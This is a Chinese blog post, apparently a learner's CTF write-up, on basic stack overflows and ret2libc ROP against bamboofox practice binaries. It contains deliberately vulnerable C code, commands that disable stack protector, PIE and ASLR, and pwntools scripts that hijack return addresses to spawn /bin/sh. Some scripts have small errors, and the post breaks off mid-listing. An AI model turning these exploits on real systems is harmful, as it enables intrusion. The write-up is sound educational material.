<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="模仿ctfwiki上实例进行首次pwn以及基本ROP的学习">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn栈溢出的首次尝试和基本ROP">
<meta property="og:url" content="http://example.com/2020/11/19/pwn%E6%A0%88%E6%BA%A2%E5%87%BA%E7%9A%84%E9%A6%96%E6%AC%A1%E5%B0%9D%E8%AF%95/index.html">
<meta property="og:site_name" content="青晷">
<meta property="og:description" content="模仿ctfwiki上实例进行首次pwn以及基本ROP的学习">
<meta property="og:locale">
<meta property="article:published_time" content="2020-11-19T07:39:04.000Z">
<meta property="article:modified_time" content="2021-02-27T06:59:34.074Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://example.com/2020/11/19/pwn栈溢出的首次尝试/"/>





  <title>pwn栈溢出的首次尝试和基本ROP | 青晷</title>
  








<meta name="generator" content="Hexo 5.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">青晷</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">昼短苦夜长，何不秉烛游</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://example.com/2020/11/19/pwn%E6%A0%88%E6%BA%A2%E5%87%BA%E7%9A%84%E9%A6%96%E6%AC%A1%E5%B0%9D%E8%AF%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="青晷">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">pwn栈溢出的首次尝试和基本ROP</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-11-19T15:39:04+08:00">
                2020-11-19
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><strong>模仿ctfwiki上实例进行首次pwn以及基本ROP的学习</strong></p>
<a id="more"></a>

<p>首先记录下手动复现实例的过程</p>
<h3 id="基础栈溢出"><a href="#基础栈溢出" class="headerlink" title="基础栈溢出"></a>基础栈溢出</h3><h4 id="构建c语言可执行文件"><a href="#构建c语言可执行文件" class="headerlink" title="构建c语言可执行文件"></a>构建c语言可执行文件</h4><p>代码如下,原文件保存为stack_example.c：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">success</span><span class="params">()</span> </span>&#123; <span class="built_in">puts</span>(<span class="string">&quot;You Hava already controlled it.&quot;</span>); &#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">vulnerable</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">char</span> s[<span class="number">12</span>];</span><br><span class="line">  gets(s);</span><br><span class="line">  <span class="built_in">puts</span>(s);</span><br><span class="line">  <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> **argv)</span> </span>&#123;</span><br><span class="line">  vulnerable();</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>终端输入命令如下，其中m32指生成32位程序，-fno-stack-protector指不开启堆栈溢出保护，-no-pie指关闭PIE：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -m32 -fno-stack-protector -no-pie stack_example.c -o stack_example</span><br></pre></td></tr></table></figure>

<p>可以用checksec工具检查编译后的文件,命令和结果如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">checksec stack_example</span><br><span class="line">    Arch:     i386-32-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x8048000)</span><br></pre></td></tr></table></figure>

<p>这里简要介绍下各项保护机制：</p>
<ul>
<li>NX：通过现代操作系统内存保护单元MPU机制对内存页的权限进行设置，具体表现为可写权限与可执行权限互斥，gcc默认开启NX保护，可在编译时加入“-z execstack”参数关闭</li>
<li>Stack Canary：针对栈溢出攻击的保护，因为栈溢出要通过溢出覆盖函数栈高位的返回地址，因此要在返回地址前写入一个字长的随机数据，在函数返回前校验该值是否被改变。gcc默认开启Stack Canary保护，可在编译时加入“-fno-stack-protector”参数关闭</li>
<li>ASLR：将程序堆栈地址和动态链接库的加载地址进行一定的随机化，是系统等级的保护机制，关闭方法是修改<code>/proc/sys/kernel/randomize_va_space</code>为0，可使用<code>echo 0 &gt; /proc/sys/kernel/randomize_va_space</code>关闭</li>
<li>PIE：类似于ASLR，将可执行程序ELF的地址进行随机化加载，可在编译时加入-no-pie”参数关闭</li>
</ul>
<h4 id="分析可执行文件结构"><a href="#分析可执行文件结构" class="headerlink" title="分析可执行文件结构"></a>分析可执行文件结构</h4><p>用IDA打开可执行文件进行分析，可以看到vulnerable函数反编译后如下图所示：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">vulnerable</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> s; <span class="comment">// [esp+4h] [ebp-14h]</span></span><br><span class="line"></span><br><span class="line">  gets(&amp;s);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">puts</span>(&amp;s);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看出字符串s距离ebp的长度为0x14,vulnerable函数对应的栈结构为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">             +-----------------+   0x1C</span><br><span class="line">             |     retaddr     |</span><br><span class="line">             +-----------------+   0x18</span><br><span class="line">             |     saved ebp   |</span><br><span class="line">      ebp---&gt;+-----------------+   0x14</span><br><span class="line">             |                 |</span><br><span class="line">             |                 |</span><br><span class="line">             |                 |</span><br><span class="line">             |                 |</span><br><span class="line">             |                 |</span><br><span class="line">             |                 |</span><br><span class="line">s,ebp-0x14--&gt;+-----------------+   0</span><br></pre></td></tr></table></figure>

<p>同时可以用IDA获取success地址，为0x0804843B</p>
<p>由于gets会读到回车才结束，就可以直接读取任意长度字符串，若我们输入的字符串为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x18*&#39;a&#39;+success_addr</span><br></pre></td></tr></table></figure>

<p>即可将success_addr覆盖retaddr内容，让程序执行success函数的内容。</p>
<p>这里需要使用pwntools，具体python2脚本代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh=process(<span class="string">&#x27;./stack_example&#x27;</span>)</span><br><span class="line"></span><br><span class="line">sa=<span class="number">0x0804843B</span></span><br><span class="line">pre=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span></span><br><span class="line">in0=pre+p32(sa)</span><br><span class="line"></span><br><span class="line">sh.sendline(in0)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>python3中由于bytes和string做了区分不能直接使用以上代码，暂时也没啥好的解决方案，暂时搁置。</p>
<p>在python2环境中运行以上脚本就可以看到success函数执行对应的输出。</p>
<hr>
<h3 id="ROP"><a href="#ROP" class="headerlink" title="ROP"></a>ROP</h3><p>ROP，即返回地址导向编程，通常利用动态链接库和可执行文件中可利用的指令片段，这些片段均以ret指令结尾，被称为gadgets。ROP攻击需要满足两个条件：</p>
<ul>
<li>程序存在溢出，并可控制返回地址</li>
<li>找到满足条件的gadgets和对应的地址</li>
</ul>
<h4 id="示例一"><a href="#示例一" class="headerlink" title="示例一"></a>示例一</h4><p>文件来源：bamboofox的ret2libc1</p>
<p>首先检查文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">ssr@ubuntu:~/pwn$ file ret2libc1</span><br><span class="line">ret2libc1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, <span class="keyword">for</span> GNU/Linux 2.6.24, BuildID[sha1]=fb89c86b266de4ff294489da59959a62f7aa1e61, not stripped</span><br><span class="line">ssr@ubuntu:~/pwn$ checksec ret2libc1</span><br><span class="line">[*] <span class="string">&#x27;/home/ssr/pwn/ret2libc1&#x27;</span></span><br><span class="line">    Arch:     i386-32-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x8048000)</span><br></pre></td></tr></table></figure>

<p>32位elf程序，开启了NX保护。</p>
<p>用IDA打开f5查看主函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> s[<span class="number">100</span>]; <span class="comment">// [esp+1Ch] [ebp-64h] BYREF</span></span><br><span class="line"></span><br><span class="line">  setvbuf(<span class="built_in">stdout</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">  setvbuf(_bss_start, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;RET2LIBC &gt;_&lt;&quot;</span>);</span><br><span class="line">  gets(s);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>使用了gets函数存在栈溢出。</p>
<p>首先确定可以控制的内存的起始地址距离main函数返回地址的字节数，需要开始调试，将断点下在<code>0x0804867E</code>即<code>call _gets</code>处，查看寄存器情况</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">ssr@ubuntu:~/pwn$ gdb ./ret2libc1</span><br><span class="line">pwndbg: loaded 190 commands. Type pwndbg [filter] <span class="keyword">for</span> a list.</span><br><span class="line">pwndbg: created <span class="variable">$rebase</span>, <span class="variable">$ida</span> gdb <span class="built_in">functions</span> (can be used with <span class="built_in">print</span>/<span class="built_in">break</span>)</span><br><span class="line">Reading symbols from ./ret2libc1...done.</span><br><span class="line">gdb-peda$ b *0x0804867E</span><br><span class="line">Breakpoint 1 at 0x804867e: file ret2libc1.c, line 27.</span><br><span class="line">gdb-peda$ r</span><br><span class="line">Starting program: /home/ssr/pwn/ret2libc1 </span><br><span class="line">RET2LIBC &gt;_&lt;</span><br><span class="line"></span><br><span class="line">省略部分内容</span><br><span class="line"></span><br><span class="line">─────────────────────────────────[ REGISTERS ]──────────────────────────────────</span><br><span class="line"> EAX  0xffffcf1c —▸ 0x8048312 ◂— pop    edi /* <span class="string">&#x27;__libc_start_main&#x27;</span> */</span><br><span class="line"> EBX  0x0</span><br><span class="line"> ECX  0xffffffff</span><br><span class="line"> EDX  0xf7fb4870 (_IO_stdfile_1_lock) ◂— 0x0</span><br><span class="line"> EDI  0xf7fb3000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0</span><br><span class="line"> ESI  0xf7fb3000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0</span><br><span class="line"> EBP  0xffffcf88 ◂— 0x0</span><br><span class="line"> ESP  0xffffcf00 —▸ 0xffffcf1c —▸ 0x8048312 ◂— pop    edi /* <span class="string">&#x27;__libc_start_main&#x27;</span> */</span><br><span class="line"> EIP  0x804867e (main+102) —▸ 0xfffdade8 ◂— 0xfffdade8</span><br><span class="line">───────────────────────────────────[ DISASM ]───────────────────────────────────</span><br></pre></td></tr></table></figure>

<p>可以看到 esp 为 0xffffcf00 ，ebp 为 0xffffcf88，s的地址为 0xffffcf1c，所以s相对于 ebp 的偏移为0x6c，所以相对与返回地址的偏移为0x6c+4</p>
<p>在IDA中使用字符查找发现<code>/bin/sh</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.rodata:08048720 aBinSh          db &#39;&#x2F;bin&#x2F;sh&#39;,0          ; DATA XREF: .data:shell↓o</span><br></pre></td></tr></table></figure>

<p>且找到函数<code>system</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.plt:08048460 ; int system(const char *command)</span><br></pre></td></tr></table></figure>

<p>则可以直接返回该处执行system函数。脚本如下所示</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io=process(<span class="string">&#x27;./ret2libc1&#x27;</span>)</span><br><span class="line">system_plt = <span class="number">0x08048460</span></span><br><span class="line">binsh_adr= <span class="number">0x08048720</span></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x6c</span>+<span class="number">4</span>)+p32(system_plt)+<span class="string">&#x27;a&#x27;</span>*<span class="number">4</span>+p32(binsh_adr)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h4 id="示例二"><a href="#示例二" class="headerlink" title="示例二"></a>示例二</h4><p>文件来源：bamboofox的ret2libc2</p>
<p>栈溢出漏洞情况与示例一基本一致，偏移量同样是0x6c+4</p>
<p>可以找到函数system</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.plt:08048490 ; int system(const char *command)</span><br></pre></td></tr></table></figure>

<p>但不存在字符串<code>/bin/sh</code>，所以需要手动读取字符串，所以需要两个gadgets，第一个控制程序读取字符串，第二个控制程序执行shellcode，然后在可写的bss段找到一个变量buf2用于存放两个控制程序的参数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.bss:0804A080 ; char buf2[100]</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io=process(<span class="string">&#x27;./ret2libc2&#x27;</span>)</span><br><span class="line">system_plt = <span class="number">0x08048490</span></span><br><span class="line">gets_plt = <span class="number">0x08048460</span></span><br><span class="line">buf2_adr= <span class="number">0x0804A080</span></span><br><span class="line"></span><br><span class="line">payload =<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x6c</span>+<span class="number">4</span>)+p32(gets_plt)</span><br><span class="line">payload+=p32(system_plt)+p32(buf2_adr)+p32(buf2_adr)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.sendline(<span class="string">&#x27;/bin/sh&#x27;</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>此时栈溢出的分布为</p>
<ul>
<li>gets地址，覆盖了main函数的返回地址</li>
<li>system地址，同样是gets的返回地址</li>
<li>buf2地址，是gets的参数，同样是system的伪返回地址</li>
<li>buf2地址，是system的参数</li>
</ul>
<h4 id="示例三"><a href="#示例三" class="headerlink" title="示例三"></a>示例三</h4><p>文件来源：bamboofox的ret2libc3</p>
<p>与示例二相比没有system函数，因为system函数属于libc，而libc.so动态链接库中的函数之间的偏移是固定的，需要通过libc找到system函数地址</p>
<p>ELF文件中通常存在.GOT.PLT和.PLT两个特殊的节，ELF编译时无法知道libc等动态链接库的加载地址，若想要调动动态链接库的函数，就必须使用.GOT.PLT和.PLT配合完成调用。</p>
<p>如果在程序段中有call _printf,其实并不是跳转到了实际的 _printf 函数位置，而是跳转到了PLT表中的 _printf 项，同时.PLT表作为一段代码，会从内存中取出 _printf 的实际地址进行跳转，而.GOT.PLT就是存放这一实际地址的地方。</p>
<p>这里使用LibcSearcher工具，可以通过泄露已经执行过的libc函数地址查询system地址，可以到其<a target="_blank" rel="noopener" href="https://github.com/lieanu/LibcSearcher">网站</a>下载。</p>
<p>首先要泄露 __libc_start_main 的地址,然后再次进入main函数获取shell，值得注意的是第二次进入main时相对偏移量变为了0x68</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io=process(<span class="string">&#x27;./ret2libc2&#x27;</span>)</span><br><span class="line">rc3=ELF(./retlibc3)</span><br><span class="line"></span><br><span class="line">main=rc3.symbols[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">puts_plt=rc3.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">libc_got=rc3.got[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#调用puts打印libc_plt后还要返回main</span></span><br><span class="line">payload =<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x6c</span>+<span class="number">4</span>)+p32(puts_plt)+p32(main)+p32(libc_got)</span><br><span class="line">io.sendlineafter(<span class="string">&#x27;Can you find it !?&#x27;</span>, payload)</span><br><span class="line"></span><br><span class="line">libc_addr=u32(io.recv()[<span class="number">0</span>:<span class="number">4</span>])</span><br><span class="line">libc=LibcSearcher(<span class="string">&quot;__libc_start_main&quot;</span>, libc_addr)</span><br><span class="line">system_addr=libc.dump(<span class="string">&quot;system&quot;</span>)+libc_addr</span><br><span class="line">binsh_addr=libc.dump(<span class="string">&quot;str_bin_sh&quot;</span>)+libc_addr</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*(<span class="number">0x68</span>)+p32(system_addr)+<span class="string">&#x27;a&#x27;</span>*<span class="number">4</span>+p32(binsh_addr)</span><br><span class="line">io.sendline(payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>



<p>下面来看一个稍微复杂攻击实例</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> buf[<span class="number">10</span>];</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;hello&quot;</span>);</span><br><span class="line">    gets(buf);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>用以下命令编译</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc rop.c -o rop -no-pie -fno-stack-protector</span><br></pre></td></tr></table></figure>

<p>与之前不同，这一程序没有预置的攻击函数，使用ROPgadget命令查找该程序中的Gadget</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br></pre></td><td class="code"><pre><span class="line">ssr@ubuntu:~/pwn$ ROPgadget --binary rop</span><br><span class="line">Gadgets information</span><br><span 